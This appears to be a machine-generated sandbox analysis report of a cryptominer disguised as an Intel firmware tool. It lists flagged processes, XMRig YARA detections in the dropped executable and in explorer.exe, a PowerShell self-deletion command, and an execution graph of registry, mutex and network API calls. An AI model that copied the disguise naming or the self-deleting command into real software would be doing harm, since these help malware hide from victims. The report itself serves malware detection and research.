                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                              Imagebase:0x7ff6ae840000
                                                                                                                                                              File size:1'827'328 bytes
                                                                                                                                                              MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000031.00000003.3117966316.000001AE2B720000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000031.00000003.3117966316.000001AE2B720000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000031.00000003.3117966316.000001AE2B720000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:50
                                                                                                                                                              Start time:05:48:02
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:explorer.exe
                                                                                                                                                              Imagebase:0x7ff609140000
                                                                                                                                                              File size:5'141'208 bytes
                                                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000032.00000002.3209991687.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000032.00000002.3123702464.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000032.00000002.3123702464.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000032.00000002.3209877428.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:51
                                                                                                                                                              Start time:05:48:02
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:52
                                                                                                                                                              Start time:05:48:02
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Reset < >

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:4.8%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:24.4%
                                                                                                                                                                Total number of Nodes:578
                                                                                                                                                                Total number of Limit Nodes:21
                                                                                                                                                                execution_graph 10217 a3c8e 10218 a3c98 10217->10218 10220 a3ca5 shared_ptr 10218->10220 10221 a2410 10218->10221 10222 a2424 10221->10222 10225 bb52d 10222->10225 10233 d3aed 10225->10233 10227 a242a 10227->10220 10228 bb5a5 ___std_exception_copy 10240 bb1ad 10228->10240 10229 bb598 10236 baf56 10229->10236 10244 d4f29 10233->10244 10235 bb555 10235->10227 10235->10228 10235->10229 10237 baf9f ___std_exception_copy 10236->10237 10239 bafb2 shared_ptr 10237->10239 10248 bb39f 10237->10248 10239->10227 10241 bb1d8 10240->10241 10243 bb1e1 shared_ptr 10240->10243 10242 bb39f InitOnceExecuteOnce 10241->10242 10242->10243 10243->10227 10247 d4f2e ___std_exception_copy 10244->10247 10245 d65ed 3 API calls 10246 d8c2f 10245->10246 10247->10235 10247->10245 10249 bbedf InitOnceExecuteOnce 10248->10249 10251 bb3e1 10249->10251 10250 bb3e8 10250->10239 10251->10250 10252 bbedf InitOnceExecuteOnce 10251->10252 10253 bb461 10252->10253 10253->10239 10052 a5c83 10053 a5c91 shared_ptr ___std_exception_copy 10052->10053 10054 a5d17 shared_ptr std::invalid_argument::invalid_argument 10053->10054 10055 a5da7 RegOpenKeyExA 10053->10055 10056 a5e00 RegCloseKey 10055->10056 10058 a5e26 10056->10058 10057 a5ea6 shared_ptr std::invalid_argument::invalid_argument 10058->10057 10067 a5c10 10058->10067 10060 a66ac 10061 a5c10 2 API calls 10060->10061 10062 a66b1 shared_ptr 10061->10062 10063 a5c10 2 API calls 10062->10063 10066 a6852 shared_ptr ___std_exception_copy std::invalid_argument::invalid_argument 10062->10066 10065 a673d shared_ptr 10063->10065 10064 a5c10 2 API calls 10064->10065 10065->10064 10065->10066 10069 a5c54 ___std_exception_copy 10067->10069 10068 a5d17 shared_ptr std::invalid_argument::invalid_argument 10068->10060 10069->10068 10070 a5da7 RegOpenKeyExA 10069->10070 10071 a5e00 RegCloseKey 10070->10071 10072 a5e26 shared_ptr ___std_exception_copy std::invalid_argument::invalid_argument 10071->10072 10072->10060 10275 a20c0 10276 bc68b __Mtx_init_in_situ 2 API calls 10275->10276 10277 a20cc 10276->10277 10278 ae0c0 recv 10279 ae122 recv 10278->10279 10280 ae157 recv 10279->10280 10282 ae191 10280->10282 10281 ae2b3 std::invalid_argument::invalid_argument 10282->10281 10283 bc6ac GetSystemTimePreciseAsFileTime 10282->10283 10284 ae2ee 10283->10284 10285 bc26a 4 API calls 10284->10285 10286 ae358 10285->10286 10356 a8980 10357 a89d8 shared_ptr 10356->10357 10359 a8aea 10356->10359 10358 a5c10 2 API calls 10357->10358 10357->10359 10358->10357 10384 a2e00 10385 a2e28 10384->10385 10386 bc68b __Mtx_init_in_situ 2 API calls 10385->10386 10387 a2e33 10386->10387 10137 a3c47 10138 a3c51 10137->10138 10139 a3c5f shared_ptr 10138->10139 10141 a32d0 10138->10141 10160 bc6ac 10141->10160 10143 a336b 10166 bc26a 10143->10166 10144 a3314 10144->10143 10147 a333c __Mtx_unlock 10144->10147 10163 bbd4c 10144->10163 10148 bc26a 4 API calls 10147->10148 10149 a3350 std::invalid_argument::invalid_argument 10147->10149 10150 a3377 10148->10150 10149->10139 10151 bc6ac GetSystemTimePreciseAsFileTime 10150->10151 10152 a33af 10151->10152 10153 bc26a 4 API calls 10152->10153 10154 a33b6 __Cnd_broadcast 10152->10154 10153->10154 10155 bc26a 4 API calls 10154->10155 10156 a33d7 __Mtx_unlock 10154->10156 10155->10156 10157 bc26a 4 API calls 10156->10157 10158 a33eb 10156->10158 10159 a340e 10157->10159 10158->10139 10159->10139 10173 bc452 10160->10173 10162 bc6b9 10162->10144 10190 bbb72 10163->10190 10165 bbd5c 10165->10144 10167 bc292 ___std_exception_copy 10166->10167 10168 bc274 10166->10168 10199 d65ed 10167->10199 10168->10167 10169 bc283 10168->10169 10196 bc297 10169->10196 10174 bc4a8 10173->10174 10176 bc47a std::invalid_argument::invalid_argument 10173->10176 10174->10176 10179 bcf6b 10174->10179 10176->10162 10177 bc4fd __Xtime_diff_to_millis2 10177->10176 10178 bcf6b _xtime_get GetSystemTimePreciseAsFileTime 10177->10178 10178->10177 10180 bcf7a 10179->10180 10182 bcf87 __aulldvrm 10179->10182 10180->10182 10183 bcf44 10180->10183 10182->10177 10186 bcbea 10183->10186 10187 bcbfb GetSystemTimePreciseAsFileTime 10186->10187 10189 bcc07 10186->10189 10187->10189 10189->10182 10191 bbb9c 10190->10191 10192 bcf6b _xtime_get GetSystemTimePreciseAsFileTime 10191->10192 10195 bbba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 10191->10195 10193 bbbcf __Xtime_diff_to_millis2 10192->10193 10194 bcf6b _xtime_get GetSystemTimePreciseAsFileTime 10193->10194 10193->10195 10194->10195 10195->10165 10202 a2ae0 10196->10202 10198 bc2ae std::_Throw_future_error 10200 d64c7 3 API calls 10199->10200 10201 d65fe 10200->10201 10205 bbedf 10202->10205 10204 a2af4 ___std_exception_copy 10204->10198 10208 bcc31 10205->10208 10209 bcc3f InitOnceExecuteOnce 10208->10209 10211 bbef2 10208->10211 10209->10211 10211->10204 10450 a9f44 10453 a9f4c shared_ptr 10450->10453 10451 aa01f shared_ptr 10452 aa953 Sleep CreateMutexA 10454 aa98e 10452->10454 10453->10451 10453->10452 10343 a215a 10346 bc6fc 10343->10346 10345 a2164 10347 bc70c 10346->10347 10349 bc724 10346->10349 10347->10349 10350 bcfbe 10347->10350 10349->10345 10351 bccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10350->10351 10352 bcfd0 10351->10352 10352->10347 10455 a735a 10457 a7368 shared_ptr 10455->10457 10456 a7400 shared_ptr std::invalid_argument::invalid_argument 10457->10456 10462 a765e shared_ptr 10457->10462 10510 bd111 10457->10510 10459 a75ed 10459->10462 10514 bd0c7 10459->10514 10461 a777f shared_ptr 10462->10461 10463 a5c10 2 API calls 10462->10463 10465 a7883 shared_ptr 10462->10465 10463->10465 10464 a5c10 2 API calls 10467 a79e3 10464->10467 10465->10464 10466 a7953 shared_ptr std::invalid_argument::invalid_argument 10465->10466 10468 a5c10 2 API calls 10467->10468 10470 a7a15 shared_ptr 10468->10470 10469 a7aa5 shared_ptr std::invalid_argument::invalid_argument 10470->10469 10471 a5c10 2 API calls 10470->10471 10476 a7be3 shared_ptr ___std_exception_copy 10470->10476 10472 a7b7d 10471->10472 10473 a5c10 2 API calls 10472->10473 10474 a7ba0 10473->10474 10475 a5c10 2 API calls 10474->10475 10475->10476 10477 a5c10 2 API calls 10476->10477 10480 a7cf4 shared_ptr std::invalid_argument::invalid_argument 10476->10480 10478 a7dd2 10477->10478 10479 a5c10 2 API calls 10478->10479 10481 a7dff 10479->10481 10481->10480 10482 a8019 10481->10482 10483 a7f3f 10481->10483 10485 a5c10 2 API calls 10482->10485 10484 a5c10 2 API calls 10483->10484 10486 a7f67 10484->10486 10487 a804c 10485->10487 10489 a5c10 2 API calls 10486->10489 10488 a5c10 2 API calls 10487->10488 10490 a806b 10488->10490 10489->10480 10491 a5c10 2 API calls 10490->10491 10492 a80a3 10491->10492 10493 a5c10 2 API calls 10492->10493 10494 a80f4 10493->10494 10495 a5c10 2 API calls 10494->10495 10496 a8113 10495->10496 10497 a5c10 2 API calls 10496->10497 10498 a814b 10497->10498 10499 a5c10 2 API calls 10498->10499 10500 a819c 10499->10500 10501 a5c10 2 API calls 10500->10501 10502 a81bb 10501->10502 10503 a5c10 2 API calls 10502->10503 10504 a81f3 10503->10504 10505 a5c10 2 API calls 10504->10505 10506 a8244 10505->10506 10507 a5c10 2 API calls 10506->10507 10508 a8263 10507->10508 10509 a5c10 2 API calls 10508->10509 10509->10480 10512 bd122 10510->10512 10513 bd12a 10512->10513 10518 bd199 10512->10518 10513->10459 10516 bd0d6 10514->10516 10515 bd17f 10515->10462 10516->10515 10517 bd17b RtlWakeAllConditionVariable 10516->10517 10517->10462 10519 bd1a7 SleepConditionVariableCS 10518->10519 10520 bd1c0 10518->10520 10519->10520 10520->10512 10522 a3f9f 10523 a3fad 10522->10523 10524 a3fb6 10522->10524 10525 a2410 4 API calls 10523->10525 10525->10524 10426 a9adc 10427 a9aea 10426->10427 10431 a9afe shared_ptr 10426->10431 10428 aa917 10427->10428 10427->10431 10429 aa953 Sleep CreateMutexA 10428->10429 10430 aa98e 10429->10430 10432 a5c10 2 API calls 10431->10432 10433 a9b7c 10432->10433 10434 a8b30 2 API calls 10433->10434 10435 a9b8d 10434->10435 10436 a5c10 2 API calls 10435->10436 10437 a9cb1 10436->10437 10438 a8b30 2 API calls 10437->10438 10439 a9cc2 10438->10439 10440 a2b10 10441 a2b1a 10440->10441 10442 a2b1c 10440->10442 10443 bc26a 4 API calls 10442->10443 10444 a2b22 10443->10444 10526 a2b90 10527 a2bce 10526->10527 10528 bb7fb TpReleaseWork 10527->10528 10529 a2bdb shared_ptr std::invalid_argument::invalid_argument 10528->10529 10640 b87d0 10641 b882a ___std_exception_copy 10640->10641 10647 b9bb0 10641->10647 10645 b88d9 std::_Throw_future_error 10646 b886c std::invalid_argument::invalid_argument 10657 b9ef0 10647->10657 10649 b9be5 10661 a2ce0 10649->10661 10651 b9c16 10667 b9f70 10651->10667 10653 b8854 10653->10646 10654 a43f0 10653->10654 10655 bbedf InitOnceExecuteOnce 10654->10655 10656 a440a 10655->10656 10656->10645 10658 b9f0c 10657->10658 10659 bc68b __Mtx_init_in_situ 2 API calls 10658->10659 10660 b9f17 10659->10660 10660->10649 10662 a2d1d 10661->10662 10663 bbedf InitOnceExecuteOnce 10662->10663 10664 a2d46 10663->10664 10666 a2d51 std::invalid_argument::invalid_argument 10664->10666 10672 bbef7 10664->10672 10666->10651 10668 b9fef shared_ptr 10667->10668 10670 ba058 10668->10670 10682 ba210 10668->10682 10671 ba03b 10671->10653 10673 bbf03 std::_Throw_future_error 10672->10673 10674 bbf6a 10673->10674 10675 bbf73 10673->10675 10679 bbe7f 10674->10679 10677 a2ae0 InitOnceExecuteOnce 10675->10677 10678 bbf6f 10677->10678 10678->10666 10680 bcc31 InitOnceExecuteOnce 10679->10680 10681 bbe97 10680->10681 10681->10678 10683 ba290 10682->10683 10689 b71d0 10683->10689 10685 ba4be shared_ptr 10685->10671 10686 ba2cc shared_ptr 10686->10685 10687 a3ee0 3 API calls 10686->10687 10688 ba4a6 10687->10688 10688->10671 10690 b7211 10689->10690 10697 a3970 10690->10697 10692 b7446 std::invalid_argument::invalid_argument 10692->10686 10693 b72ad ___std_exception_copy 10693->10692 10694 bc68b __Mtx_init_in_situ 2 API calls 10693->10694 10695 b7401 10694->10695 10702 a2ec0 10695->10702 10698 bc68b __Mtx_init_in_situ 2 API calls 10697->10698 10699 a39a7 10698->10699 10700 bc68b __Mtx_init_in_situ 2 API calls 10699->10700 10701 a39e6 10700->10701 10701->10693 10703 a2f7e GetCurrentThreadId 10702->10703 10704 a2f06 10702->10704 10705 a2f94 10703->10705 10722 a2fef 10703->10722 10706 bc6ac GetSystemTimePreciseAsFileTime 10704->10706 10711 bc6ac GetSystemTimePreciseAsFileTime 10705->10711 10705->10722 10707 a2f12 10706->10707 10708 a301e 10707->10708 10714 a2f1d __Mtx_unlock 10707->10714 10709 bc26a 4 API calls 10708->10709 10710 a3024 10709->10710 10712 bc26a 4 API calls 10710->10712 10713 a2fb9 10711->10713 10712->10713 10716 bc26a 4 API calls 10713->10716 10717 a2fc0 __Mtx_unlock 10713->10717 10714->10710 10715 a2f6f 10714->10715 10715->10703 10715->10722 10716->10717 10718 bc26a 4 API calls 10717->10718 10719 a2fd8 __Cnd_broadcast 10717->10719 10718->10719 10720 bc26a 4 API calls 10719->10720 10719->10722 10721 a303c 10720->10721 10723 bc6ac GetSystemTimePreciseAsFileTime 10721->10723 10722->10692 10731 a3080 shared_ptr __Mtx_unlock 10723->10731 10724 a31c5 10725 bc26a 4 API calls 10724->10725 10726 a31cb 10725->10726 10727 bc26a 4 API calls 10726->10727 10728 a31d1 10727->10728 10729 bc26a 4 API calls 10728->10729 10737 a3193 __Mtx_unlock 10729->10737 10730 a31a7 std::invalid_argument::invalid_argument 10730->10692 10731->10724 10731->10726 10731->10730 10733 a3132 GetCurrentThreadId 10731->10733 10732 bc26a 4 API calls 10734 a31dd 10732->10734 10733->10730 10735 a313b 10733->10735 10735->10730 10736 bc6ac GetSystemTimePreciseAsFileTime 10735->10736 10738 a315f 10736->10738 10737->10730 10737->10732 10738->10724 10738->10728 10738->10737 10739 bbd4c GetSystemTimePreciseAsFileTime 10738->10739 10739->10738 10077 aa856 10078 aa870 10077->10078 10079 aa892 shared_ptr 10077->10079 10078->10079 10080 aa94e 10078->10080 10084 aa8a0 10079->10084 10093 a7d30 10079->10093 10083 aa953 Sleep CreateMutexA 10080->10083 10082 aa8ae 10082->10084 10085 a7d30 2 API calls 10082->10085 10089 aa98e 10083->10089 10086 aa8b8 10085->10086 10086->10084 10087 a7d30 2 API calls 10086->10087 10088 aa8c2 10087->10088 10088->10084 10090 a7d30 2 API calls 10088->10090 10091 aa8cc 10090->10091 10091->10084 10092 a7d30 2 API calls 10091->10092 10092->10084 10094 a7d96 ___std_exception_copy 10093->10094 10095 a5c10 2 API calls 10094->10095 10127 a7f86 shared_ptr std::invalid_argument::invalid_argument 10094->10127 10096 a7dd2 10095->10096 10097 a5c10 2 API calls 10096->10097 10098 a7dff 10097->10098 10099 a8019 10098->10099 10100 a7f3f 10098->10100 10098->10127 10102 a5c10 2 API calls 10099->10102 10101 a5c10 2 API calls 10100->10101 10103 a7f67 10101->10103 10104 a804c 10102->10104 10106 a5c10 2 API calls 10103->10106 10105 a5c10 2 API calls 10104->10105 10107 a806b 10105->10107 10106->10127 10108 a5c10 2 API calls 10107->10108 10109 a80a3 10108->10109 10110 a5c10 2 API calls 10109->10110 10111 a80f4 10110->10111 10112 a5c10 2 API calls 10111->10112 10113 a8113 10112->10113 10114 a5c10 2 API calls 10113->10114 10115 a814b 10114->10115 10116 a5c10 2 API calls 10115->10116 10117 a819c 10116->10117 10118 a5c10 2 API calls 10117->10118 10119 a81bb 10118->10119 10120 a5c10 2 API calls 10119->10120 10121 a81f3 10120->10121 10122 a5c10 2 API calls 10121->10122 10123 a8244 10122->10123 10124 a5c10 2 API calls 10123->10124 10125 a8263 10124->10125 10126 a5c10 2 API calls 10125->10126 10126->10127 10127->10082 10032 d6629 10035 d64c7 10032->10035 10036 d64d5 10035->10036 10037 d6520 10036->10037 10040 d652b 10036->10040 10039 d652a 10046 da302 GetPEB 10040->10046 10042 d6535 10043 d654a 10042->10043 10044 d653a GetPEB 10042->10044 10045 d6562 ExitProcess 10043->10045 10044->10043 10047 da31c 10046->10047 10047->10042 10073 ab1a0 10074 ab1f2 10073->10074 10075 ab3ad CoInitialize 10074->10075 10076 ab3fa shared_ptr std::invalid_argument::invalid_argument 10075->10076 10254 a20a0 10257 bc68b 10254->10257 10256 a20ac 10260 bc3d5 10257->10260 10259 bc69b 10259->10256 10261 bc3e1 10260->10261 10262 bc3eb 10260->10262 10263 bc3be 10261->10263 10264 bc39e 10261->10264 10262->10259 10273 bcd0a 10263->10273 10264->10262 10269 bccd5 10264->10269 10266 bc3d0 10266->10259 10270 bc3b7 10269->10270 10271 bcce3 InitializeCriticalSectionEx 10269->10271 10270->10259 10271->10270 10274 bcd1f RtlInitializeConditionVariable 10273->10274 10274->10266 10291 a4120 10292 a416a 10291->10292 10294 a41b2 Concurrency::details::_ContextCallback::_CallInContext std::invalid_argument::invalid_argument 10292->10294 10295 a3ee0 10292->10295 10296 a3f48 10295->10296 10297 a3f1e 10295->10297 10298 a3f58 10296->10298 10301 a2c00 10296->10301 10297->10294 10298->10294 10302 a2c0e 10301->10302 10308 bb847 10302->10308 10304 a2c42 10305 a2c49 10304->10305 10314 a2c80 10304->10314 10305->10294 10307 a2c58 std::_Throw_future_error 10309 bb873 Concurrency::details::_Reschedule_chore 10308->10309 10310 bb854 10308->10310 10309->10304 10317 bcb77 10310->10317 10312 bb864 10312->10309 10319 bb81e 10312->10319 10325 bb7fb 10314->10325 10316 a2cb2 shared_ptr 10316->10307 10318 bcb92 CreateThreadpoolWork 10317->10318 10318->10312 10320 bb827 Concurrency::details::_Reschedule_chore 10319->10320 10323 bcdcc 10320->10323 10322 bb841 10322->10309 10324 bcde1 TpPostWork 10323->10324 10324->10322 10326 bb817 10325->10326 10327 bb807 10325->10327 10326->10316 10327->10326 10329 bca78 10327->10329 10330 bca8d TpReleaseWork 10329->10330 10330->10326 10740 a3fe0 10741 a4022 10740->10741 10742 a408c 10741->10742 10743 a40d2 10741->10743 10746 a4035 std::invalid_argument::invalid_argument 10741->10746 10747 a35e0 10742->10747 10744 a3ee0 3 API calls 10743->10744 10744->10746 10748 a3616 10747->10748 10749 a2ce0 InitOnceExecuteOnce 10748->10749 10752 a364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 10748->10752 10750 a369e 10749->10750 10751 a2c00 3 API calls 10750->10751 10750->10752 10751->10752 10752->10746 10530 a9ba5 10531 a9ba7 10530->10531 10532 a5c10 2 API calls 10531->10532 10533 a9cb1 10532->10533 10534 a8b30 2 API calls 10533->10534 10535 a9cc2 10534->10535 10396 a9ab8 10398 a9acc 10396->10398 10399 a9b08 10398->10399 10400 a5c10 2 API calls 10399->10400 10401 a9b7c 10400->10401 10408 a8b30 10401->10408 10403 a9b8d 10404 a5c10 2 API calls 10403->10404 10405 a9cb1 10404->10405 10406 a8b30 2 API calls 10405->10406 10407 a9cc2 10406->10407 10409 a8b7c 10408->10409 10410 a5c10 2 API calls 10409->10410 10411 a8b97 shared_ptr std::invalid_argument::invalid_argument 10410->10411 10411->10403 10048 a87b2 10049 a87b8 GetFileAttributesA 10048->10049 10050 a87b6 10048->10050 10051 a87c4 10049->10051 10050->10049 10331 a8d30 10332 a8d80 10331->10332 10333 a5c10 2 API calls 10332->10333 10334 a8d9a shared_ptr std::invalid_argument::invalid_argument 10333->10334 10353 a2170 10354 bc6fc InitializeCriticalSectionEx 10353->10354 10355 a217a 10354->10355 10412 a42b0 10415 a3ac0 10412->10415 10414 a42bb shared_ptr 10416 a3af9 10415->10416 10417 a32d0 5 API calls 10416->10417 10419 a3c38 10416->10419 10420 a3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10416->10420 10417->10419 10418 a32d0 5 API calls 10421 a3c5f shared_ptr 10418->10421 10419->10418 10419->10421 10420->10414 10421->10414 10536 a77b0 10537 a77f1 shared_ptr 10536->10537 10538 a5c10 2 API calls 10537->10538 10540 a7883 shared_ptr 10537->10540 10538->10540 10539 a5c10 2 API calls 10542 a79e3 10539->10542 10540->10539 10541 a7953 shared_ptr std::invalid_argument::invalid_argument 10540->10541 10543 a5c10 2 API calls 10542->10543 10545 a7a15 shared_ptr 10543->10545 10544 a7aa5 shared_ptr std::invalid_argument::invalid_argument 10545->10544 10546 a5c10 2 API calls 10545->10546 10551 a7be3 shared_ptr ___std_exception_copy 10545->10551 10547 a7b7d 10546->10547 10548 a5c10 2 API calls 10547->10548 10549 a7ba0 10548->10549 10550 a5c10 2 API calls 10549->10550 10550->10551 10552 a5c10 2 API calls 10551->10552 10555 a7cf4 shared_ptr std::invalid_argument::invalid_argument 10551->10555 10553 a7dd2 10552->10553 10554 a5c10 2 API calls 10553->10554 10556 a7dff 10554->10556 10556->10555 10557 a7f3f 10556->10557 10558 a8019 10556->10558 10559 a5c10 2 API calls 10557->10559 10560 a5c10 2 API calls 10558->10560 10561 a7f67 10559->10561 10562 a804c 10560->10562 10564 a5c10 2 API calls 10561->10564 10563 a5c10 2 API calls 10562->10563 10565 a806b 10563->10565 10564->10555 10566 a5c10 2 API calls 10565->10566 10567 a80a3 10566->10567 10568 a5c10 2 API calls 10567->10568 10569 a80f4 10568->10569 10570 a5c10 2 API calls 10569->10570 10571 a8113 10570->10571 10572 a5c10 2 API calls 10571->10572 10573 a814b 10572->10573 10574 a5c10 2 API calls 10573->10574 10575 a819c 10574->10575 10576 a5c10 2 API calls 10575->10576 10577 a81bb 10576->10577 10578 a5c10 2 API calls 10577->10578 10579 a81f3 10578->10579 10580 a5c10 2 API calls 10579->10580 10581 a8244 10580->10581 10582 a5c10 2 API calls 10581->10582 10583 a8263 10582->10583 10584 a5c10 2 API calls 10583->10584 10584->10555 10585 a87b0 10586 a87b8 GetFileAttributesA 10585->10586 10587 a87b6 10585->10587 10588 a87c4 10586->10588 10587->10586 10589 b47b0 10591 b4eed 10589->10591 10590 b4f59 shared_ptr std::invalid_argument::invalid_argument 10591->10590 10592 a7d30 2 API calls 10591->10592 10593 b50ed 10592->10593 10628 a8380 10593->10628 10595 b5106 10596 a5c10 2 API calls 10595->10596 10597 b5155 10596->10597 10598 a5c10 2 API calls 10597->10598 10599 b5171 10598->10599 10634 a9a00 10599->10634 10629 a83e5 ___std_exception_copy 10628->10629 10630 a5c10 2 API calls 10629->10630 10633 a8403 shared_ptr std::invalid_argument::invalid_argument 10629->10633 10631 a8427 10630->10631 10632 a5c10 2 API calls 10631->10632 10632->10633 10633->10595 10635 a9a3f 10634->10635 10636 a5c10 2 API calls 10635->10636 10637 a9a47 10636->10637 10638 a8b30 2 API calls 10637->10638 10639 a9a58 10638->10639 10388 a4276 10389 a2410 4 API calls 10388->10389 10390 a427f 10389->10390 10133 a8437 10134 a8439 10133->10134 10135 a5c10 2 API calls 10134->10135 10136 a8454 shared_ptr std::invalid_argument::invalid_argument 10135->10136 10365 aa9f4 10374 a9230 10365->10374 10367 aaa03 shared_ptr 10368 a5c10 2 API calls 10367->10368 10373 aaab3 shared_ptr std::invalid_argument::invalid_argument 10367->10373 10369 aaa65 10368->10369 10370 a5c10 2 API calls 10369->10370 10371 aaa8d 10370->10371 10372 a5c10 2 API calls 10371->10372 10372->10373 10377 a9284 shared_ptr 10374->10377 10375 a5c10 2 API calls 10375->10377 10376 a9543 shared_ptr std::invalid_argument::invalid_argument 10376->10367 10377->10375 10378 a944f shared_ptr 10377->10378 10378->10376 10379 a979f shared_ptr 10378->10379 10380 a5c10 2 API calls 10378->10380 10381 a98b5 shared_ptr std::invalid_argument::invalid_argument 10379->10381 10382 a5c10 2 API calls 10379->10382 10380->10378 10381->10367 10383 a9927 shared_ptr std::invalid_argument::invalid_argument 10382->10383 10383->10367
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,t#,23EFEB74), ref: 000A5DCC
                                                                                                                                                                • RegQueryValueExA.KERNEL32(t#,?,00000000,00000000,?,00000400,?,?,00000000,00000001,t#,23EFEB74), ref: 000A5DFA
                                                                                                                                                                • RegCloseKey.KERNEL32(t#,?,?,00000000,00000001,t#,23EFEB74), ref: 000A5E06
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
